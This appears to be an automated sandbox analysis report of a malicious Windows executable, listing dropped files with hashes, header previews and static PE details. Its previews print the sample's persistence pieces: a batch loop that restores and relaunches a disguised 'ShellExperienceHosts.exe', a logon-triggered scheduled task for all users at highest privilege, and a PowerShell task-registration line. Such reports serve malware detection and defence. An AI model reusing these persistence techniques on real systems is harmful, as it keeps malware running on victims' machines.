Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....U..U..U]..T..U]..T..U]..T..U]..T..U...T#.U...T..U...T..U...T..U..UW.U...T..U...T..U..[U..U...T..URich..U........................PE..L......d..........".......... ....../.............@.......................... ..................................................(....@...................\..............T........................... ...@............................................tp6............b.................. ..`.tp6.a..nZ.......\...f..............@..@.tp6......... ......................@..@.tp6.........@......................@..@.tp6d...5%.......&...f.............. ...................................................................................................................................................................................................................................................................................

C:\Users\Public\Bulete\program\yyzyBase.dll

Download File

Process:	C:\Users\user\Desktop\PKHDJwnF0I.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2187288
Entropy (8bit):	6.6277156683522
Encrypted:	false
SSDEEP:	49152:FaGHi7XpIMUxJUv0eraRhfJqR0thQeZiHk7OVlq2Bs3kXWVTxT/5:0GHYXpIHxJQtraDy0thQHE7OVTs3kXWN
MD5:	655638B8411B2156483379CB75D11292
SHA1:	4C645C2D76588A25D8CD0114431097E15009CB7B
SHA-256:	105DE261D52BE86A40ADDBD75A213A530B0F5A4646843E3356C57A2F72E18A51
SHA-512:	D00E6AE659FDB3B49F1FA9E4C51187DD6B0A933B1FD86B6190BE6325D6CAD23C8F0B0E3BFA7067A5FDFF5A543887C1C7F54D0676ABF2954150D17F4CB49E854B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3)t.RG'.RG'.RG'.D&.RG'.C&.RG'.B&wRG'.A&.RG'.F&.RG'.RF'.QG'..D&.RG'..C&.RG'..B&&SG' .N&.RG' .G&.RG' .'.RG' .E&.RG'Rich.RG'........................PE..L...B.Sg...........!........(.......O........................................!...........@.............................L...,...h........G............!..H...`..8...0...8...........................p...@............................................text............................... ..`.rdata...P.......R..................@..@.data.......`...^...B..............@....rsrc....G.......H..................@..@.reloc..8....`...0..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	5.407676655132095
Encrypted:	false
SSDEEP:	24:3gWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9tXt/NK3R88bJ02raW3b1:QWSU4xymI4RfoUeW+mZ9tlNWR832Oab1
MD5:	F997C27FFDA479D9192B807412F26DFE
SHA1:	9F34F319449C5EB38CC9C784839FB5D565D7ED55
SHA-256:	326C18198E0E5A9D50ED8A36FEF00387606EADA3BD9E7F8B07BCEC8F203427C5
SHA-512:	C42C3E51A7C40C41DDD88EABD3CEBF6980245CC775647E6AEA6BC30888D7490C76AF168BE1B6308991FC63690A8EF610EEA8CBDE1B0D1B1C2CA3BB0FA830A9BF
Malicious:	false
Preview:	@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\PolicyManagement.xml

Download File

Process:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1893
Entropy (8bit):	5.212287775015203
Encrypted:	false
SSDEEP:	48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
MD5:	E3FB2ECD2AD10C30913339D97E0E9042
SHA1:	A004CE2B3D398312B80E2955E76BDA69EF9B7203
SHA-256:	1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
SHA-512:	9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a30jm2lq.hke.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cglf4nm4.edd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldy04dia.oy0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2fhrn4v.3tc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcyqvwi1.23u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtkbxrq3.ehm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsqv1uuz.bp0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_za3ftsq3.tcc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\backup.dll

Download File

Process:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2187288
Entropy (8bit):	6.6277156683522
Encrypted:	false
SSDEEP:	49152:FaGHi7XpIMUxJUv0eraRhfJqR0thQeZiHk7OVlq2Bs3kXWVTxT/5:0GHYXpIHxJQtraDy0thQHE7OVTs3kXWN
MD5:	655638B8411B2156483379CB75D11292
SHA1:	4C645C2D76588A25D8CD0114431097E15009CB7B
SHA-256:	105DE261D52BE86A40ADDBD75A213A530B0F5A4646843E3356C57A2F72E18A51
SHA-512:	D00E6AE659FDB3B49F1FA9E4C51187DD6B0A933B1FD86B6190BE6325D6CAD23C8F0B0E3BFA7067A5FDFF5A543887C1C7F54D0676ABF2954150D17F4CB49E854B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3)t.RG'.RG'.RG'.D&.RG'.C&.RG'.B&wRG'.A&.RG'.F&.RG'.RF'.QG'..D&.RG'..C&.RG'..B&&SG' .N&.RG' .G&.RG' .'.RG' .E&.RG'Rich.RG'........................PE..L...B.Sg...........!........(.......O........................................!...........@.............................L...,...h........G............!..H...`..8...0...8...........................p...@............................................text............................... ..`.rdata...P.......R..................@..@.data.......`...^...B..............@....rsrc....G.......H..................@..@.reloc..8....`...0..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\backup.exe

Download File

Process:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	649416
Entropy (8bit):	6.182028963232553
Encrypted:	false
SSDEEP:	12288:zohLz8nnnnntnnnnnnnnnnnnnnnxnMvnnnnPZnnnnPxnnnnnnnnqshJSLnk41mCL:zshQmC5Bz5CLgBFqGI1yi/UQeZndsqro
MD5:	0922B22053A6D5D9516EA910D34A4771
SHA1:	784D3ED35D040091AE209792E2FA8FC97EE6A071
SHA-256:	41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
SHA-512:	909EC8B2C1045CC11C03C6B82B7ED6AD96BC8E93F9C98CB8A668572C84CBBCE778C12365B2B2EB547218783A830BE41458E0AE21939E99339F54921D98D944D8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....U..U..U]..T..U]..T..U]..T..U]..T..U...T#.U...T..U...T..U...T..U..UW.U...T..U...T..U..[U..U...T..URich..U........................PE..L......d..........".......... ....../.............@.......................... ..................................................(....@...................\..............T........................... ...@............................................tp6............b.................. ..`.tp6.a..nZ.......\...f..............@..@.tp6......... ......................@..@.tp6.........@......................@..@.tp6d...5%.......&...f.............. ...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\monitor.bat

Download File

Process:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	799
Entropy (8bit):	5.133222805965959
Encrypted:	false
SSDEEP:	24:NFW/WilW/WvlWE3fzWcmrfZKx31SIYaYZLZ6y:NFVIVNjvzCZKx31SIYN/6y
MD5:	3B361EC9F7132332DD5FC2031ACA6305
SHA1:	3A2672F4FA8194B46BC20DA16E085DC9F26785A6
SHA-256:	740F6CE9EF39BB4728FE1C8CF21DBABACE5A79395BDF6EFEE4F56866B1318056
SHA-512:	3028C1D056A0806E3CDCBB2D2B5A737FD4C4872A1C401FB32098892F766E37EBB840E0575E4543F2F68C74FBCA8632AB74BCA229D6E4BD2F1843B666D211EE5E
Malicious:	false
Preview:	@echo off..:CheckProcess..set "ProcessName=ShellExperienceHosts.exe"..set "ProcessPath=C:\Users\Public\Bulete\program\ShellExperienceHosts.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bulete\program\yyzyBase.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" \| findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..

C:\Users\user\AppData\Local\Temp\monitor.pid

Download File

Process:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Lk:g
MD5:	299570476C6F0309545110C592B6A63B
SHA1:	4C90181223E889A37C94B7C61243D3A5F6E0A8A4
SHA-256:	075441BE7BC0CDBAB6093BBAED5A25B2C06D33C6A2E74601CBEA17D0885A75A5
SHA-512:	977103C09D28FB5B01F8C8435286E9B48452A87D061CCF72EBA45F12D19C8AC53A3609F8A0EE7F01A1950AB7752D954FEC72566E5F92BF3CCA0E6EB66C40D8E3
Malicious:	false
Preview:	1772

C:\Users\user\AppData\Local\updated.ps1

Download File

Process:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	151
Entropy (8bit):	4.741657013789009
Encrypted:	false
SSDEEP:	3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
MD5:	AA0E1012D3B7C24FAD1BE4806756C2CF
SHA1:	FE0D130AF9105D9044FF3D657D1ABEAF0B750516
SHA-256:	FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
SHA-512:	15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
Malicious:	true
Preview:	$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath \| Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

C:\Users\user\Desktop\AnyDesk.exe.lnk

Download File

Process:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jan 3 15:17:42 2025, mtime=Fri Jan 3 15:17:43 2025, atime=Fri Nov 22 02:46:53 2024, length=4993864, window=hide
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	4.676424513494945
Encrypted:	false
SSDEEP:	12:8kpRUlGIrCICHqXIZx6XMdACmqIv9OlA3jA2RhnRTGCAFav6UmnzY44t2YZ/elFM:86AGy4OBFOyA2R/LvenzHqyFm
MD5:	66BB4B954A7E516AE96C450E476D09C7
SHA1:	DE899E7C776F6EF5DD4416575CF548ABE7F22A65
SHA-256:	E38345DE35FB473C25796929ECF71B8FDD3ABA97A3132D0FE7DAC65B459A5FDD
SHA-512:	A1AAE99FB132925264238A5AA5F82BBF52DBF8326A9ED77527575A1A6847606090AE2E1A68660EA21E581BBCD1501BF774B5FDB8E5C19A53870780AC7979B42B
Malicious:	false
Preview:	L..................F.... ....oC..]...l...]...~=+.<..H3L..........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH#Z5.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\|.1.....#Z6...Public..f......O.I#Z6.....+...............<......+..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1.....#Z6...Bulete..>......#Z6.#Z6...........................VT..B.u.l.e.t.e.....b.2.H3L.vY.. .AnyDesk.exe.H......#Z6.#Z6............................L..A.n.y.D.e.s.k...e.x.e.......Q...............-.......P.............D......C:\Users\Public\Bulete\AnyDesk.exe........\.....\.P.u.b.l.i.c.\.B.u.l.e.t.e.\.A.n.y.D.e.s.k...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......141700...........hT..CrF.f4... ..~T..b...,.......hT..CrF.f4... ..~T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h..

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	138
Entropy (8bit):	4.05408625240476
Encrypted:	false
SSDEEP:	3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htyd:hYFRamFSQZ0lv5y/9JctESnQUq3tyd
MD5:	2674216C7897B20F802B35E60D0AB62B
SHA1:	4E5097382478E4F36A46EDE840F36445127AD712
SHA-256:	A352030E0F8B55FC79F3D6959EDECA8CC9252E6D9E8F62B43788E7966F4611B8
SHA-512:	F564FD40EE43F34EC1D3D9EA7B37249B8E9FEECA24807EAE46D40F8DD0B69F59569CC5085F11D51C7CED12239106BAA43D933C3065350DF3F0120D1B28AF6D85
Malicious:	false
Preview:	..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.962148183967602
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PKHDJwnF0I.exe
File size:	6'400'844 bytes
MD5:	4f09bb774ec9135be056f7329eb5bea5
SHA1:	95f4ff84d83e5d48646c11731ce44b25ecb3f20d
SHA256:	0d40a003f6db399d5fe640b2488ffb9a9de7982add8c18e4dbbf17ca457e31b2
SHA512:	e7f8a84223023d2695dd3712a0ec67c5861d34fa9fa100086931d655146a768e8985e297e775d38c047588e094d8ed05dc60b748fc1eedc8d7815f4600c6d79a
SSDEEP:	98304:Fphh6DXtZxXu7BZ0QVAWMfRsEoanh4afkgxRX9+B2jx1C+CNFoTMzUtpd:Fpv6rLxXuf0djoo4wIsF1CVwTMwt7
TLSH:	4D5623D57398E375E6A29630EAA70AF50932BD99E520F47BD2643B0C7DB4B00A07531F
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................h...............0....@.................................A........................................P...........,..........)ca..H.

File Icon


Icon Hash:	3f43e872666cd520

Static PE Info

General

Entrypoint:	0x411def
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b5a014d7eeb4c2042897567e1288a095

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00414C50h
push 00411F80h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00413184h]
pop ecx
or dword ptr [00419924h], FFFFFFFFh
or dword ptr [00419928h], FFFFFFFFh
call dword ptr [00413188h]
mov ecx, dword ptr [0041791Ch]
mov dword ptr [eax], ecx
call dword ptr [0041318Ch]
mov ecx, dword ptr [00417918h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00413190h]
mov eax, dword ptr [eax]
mov dword ptr [00419920h], eax
call 00007F3054816D72h
cmp dword ptr [00417710h], ebx
jne 00007F3054816C5Eh
push 00411F78h
call dword ptr [00413194h]
pop ecx
call 00007F3054816D44h
push 00417048h
push 00417044h
call 00007F3054816D2Fh
mov eax, dword ptr [00417914h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00417910h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041319Ch]
push 00417040h
push 00417000h
call 00007F3054816CFCh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150dc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x52cfc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x616329	0x4818
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x310	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11317	0x11400	797279c5ab1a163aed1f2a528f9fe3ce	False	0.6174988677536232	data	6.576987441854239	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x30ea	0x3200	1359639b02bcb8f0a8743e6ead1c0030	False	0.43828125	data	5.549434098115495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x292c	0x800	9415c9c8dea3245d6d73c23393e27d8e	False	0.431640625	data	3.6583182363171756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x52cfc	0x52e00	245e0061051191c28806833062f9d410	False	0.1521434294871795	data	4.9556234886773645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x1c3c0	0x198	PNG image data, 210 x 143, 4-bit colormap, non-interlaced	Chinese	China	0.8406862745098039
RT_CURSOR	0x1c558	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"			0.35714285714285715
RT_CURSOR	0x1c68c	0x134	data			0.44155844155844154
RT_CURSOR	0x1c7c0	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"			0.40584415584415584
RT_CURSOR	0x1c8f4	0x134	Targa image data 64 x 65536 x 1 +32 "\001"			0.5746753246753247
RT_CURSOR	0x1ca28	0x134	AmigaOS bitmap font "(", fc_YSize 4294966287, 3840 elements, 2nd "\376\017\340\377\377\017\341\377\377\217\343\377\377\337\367\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd			0.4642857142857143
RT_CURSOR	0x1cb5c	0x134	Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"			0.32142857142857145
RT_CURSOR	0x1cc90	0x134	data			0.3409090909090909
RT_CURSOR	0x1cdc4	0x134	Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"			0.4837662337662338
RT_CURSOR	0x1cef8	0x134	AmigaOS bitmap font "(", fc_YSize 4294935297, 3840 elements, 2nd "\200\003\377\201\300\007\377\203\300\017\377\003\340\037\376\007\360\037\370\017\370\003\300\037\374", 3rd			0.711038961038961
RT_CURSOR	0x1d02c	0x134	data			0.6038961038961039
RT_CURSOR	0x1d160	0x134	Targa image data 64 x 65536 x 1 +32 "\001"			0.36038961038961037
RT_CURSOR	0x1d294	0x134	Targa image data 64 x 65536 x 1 +32 "\001"			0.3474025974025974
RT_CURSOR	0x1d3c8	0x134	AmigaOS bitmap font "(", fc_YSize 4294967040, 3840 elements, 2nd "\376", 3rd			0.4383116883116883
